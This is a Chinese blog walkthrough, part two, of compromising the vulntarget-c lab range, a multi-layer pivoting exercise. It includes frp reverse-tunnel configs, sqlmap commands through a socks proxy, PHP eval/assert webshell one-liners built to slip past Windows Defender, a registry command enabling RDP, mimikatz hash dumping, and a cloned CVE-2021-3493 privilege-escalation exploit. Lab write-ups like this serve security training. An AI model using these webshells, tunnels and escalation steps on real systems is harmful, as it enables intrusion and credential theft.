【永久开源】vulntarget-c 打靶记录(下)

简介: 【永久开源】vulntarget-c 打靶记录

3.2 第二层


现第二块网

然后添加路由,设置socks5代理,使用代理nmap进行IP扫描

扫描到了20.10080端口开放了

NMAP扫描只开放了80443

firefox设置一个socks5代理

然后使用socks代理访问到了80端口,是一个OVAS-PHP

随手一个admin,进入到了后台登录。这个系统没见过,百度搜了一下也没什么信息

BURP设置一个socks代理,然后访问网站抓包,proxy的代理配置好之后,socks配置完成就可以抓包了

我用的kali自带的burp,爆破起来很慢,就偷个懒,写一个简单的字典进行爆破。就假装我这里爆破成功了

在后台修改文章处存在SQL注入

搭建frp隧道 服务端

#frps.ini
[common]
bind_port = 7002

客户端

#frpc.ini
[common]
server_addr = 192.168.0.107
server_port = 7002
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

使用冰蝎上传frpc到目标服务器,然后使用msf执行

python3 -c 'import pty;pty.spawn("/bin/bash")

使用sqlmap进行爆破,sqlmap -r sql.txt --proxy=socks://10.30.7.99:8888,还是frp快!存在SQL注入

os-shell是可以执行命令的,当前还是一个system权限

我在C:\xampp\htdocs\ovas\admin\categories目录下写了文件

http://10.0.20.100/admin/categories/index2.php

phpinfo();可以执行,但是写木马文件就会被杀掉。

echo <?php $a = $_REQUEST['d'];$a = "$a";$b['test'] = "";eval($b['test']."$a");?> > index.php
echo <?php $a = "assert";$fun = "a";array_map($$fun, array($_REQUEST['a']));?> > test.php

存在windows defender

借用作者大大的免杀一句话,我写到了根目录的index.php,如果写到admin还需要添加数据,添加上登录的账号密码:

存在第二块网卡

免杀上线MSF,执行上传的后门文件

第二个flagc:\Users\Administrator\flag.txt,不能使用doc命令搜索,名字为flag/flag.txt的太多了


3.3 第三层


添加路由

执行mimikazi需要system权限,使用ps列举,然后窃取token

抓取hash

使用md5解密网站进行解密,查询到是付费的,由于是本地,就不解密了Admin#123

使用nmap或者msf的模块对端口进行扫描,只开放了22

开启windows机器的3389进行登录

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用代理工具,这是kali的代理

连接错误是由于开启了验证

需要使用相同版本的计算机才可以,这里我没有2016的机器就直接关掉这个选项了

3389登录成功

存在一个ssh连接工具,使用win2016的登录密码可以进来,然后有10.0.10.110ssh用户连接

我直接给Defender关闭了

我在这里关闭了,110也访问不到2016这台机器,所以就不搞msf了,查看110这台机器的版本,可以搜索到一些提权脚本

下载脚本进行提权 git clone https://github.com/briskets/CVE-2021-3493

编译好之后上传,提权成功

获取最后的flag

相关文章
|
安全 Linux 测试技术
配置Goby工具环境(win,linux,macOS)
配置Goby工具环境(win,linux,macOS)
1374 2
|
Prometheus 监控 安全
SpringBoot Actuator未授权访问漏洞的解决方法
SpringBoot Actuator未授权访问漏洞的解决方法Actuator 是 SpringBoot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。
30529 0
|
5月前
|
关系型数据库 MySQL 网络安全
MySQL 深潜 - X-plugin的传输协议
文章详细解析了X protocol的认证方式(如PLAIN、MYSQL41等)、协议格式及连接建立过程,包括服务端初始化、任务调度、请求处理等关键步骤,并结合代码示例说明认证流程。
|
7月前
|
SQL 存储 关系型数据库
MySQL选错索引了怎么办?
本文探讨了MySQL中因索引选择不当导致查询性能下降的问题。通过创建包含10万行数据的表并插入数据,分析了一条简单SQL语句在不同场景下的执行情况。实验表明,当数据频繁更新时,MySQL可能因统计信息不准确而选错索引,导致全表扫描。文章深入解析了优化器判断扫描行数的机制,指出基数统计误差是主要原因,并提供了通过`analyze table`重新统计索引信息的解决方法。
203 3
|
9月前
|
机器学习/深度学习 人工智能 机器人
TIGER:清华突破性模型让AI「听觉」进化:参数量暴降94%,菜市场都能分离清晰人声
TIGER 是清华大学推出的轻量级语音分离模型,通过时频交叉建模和多尺度注意力机制,显著提升语音分离效果,同时降低参数量和计算量。
843 6
TIGER:清华突破性模型让AI「听觉」进化:参数量暴降94%,菜市场都能分离清晰人声
|
分布式计算 大数据 Java
大数据-86 Spark 集群 WordCount 用 Scala & Java 调用Spark 编译并打包上传运行 梦开始的地方
大数据-86 Spark 集群 WordCount 用 Scala & Java 调用Spark 编译并打包上传运行 梦开始的地方
246 1
大数据-86 Spark 集群 WordCount 用 Scala & Java 调用Spark 编译并打包上传运行 梦开始的地方
|
移动开发 JavaScript 数据可视化
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
安全 网络安全 PHP
RCE攻击绕过WAF详解
RCE攻击绕过WAF详解
286 3
|
网络安全
2024年---蓝桥杯网络安全赛道部分WP
2024年---蓝桥杯网络安全赛道部分WP
下一篇
oss云网关配置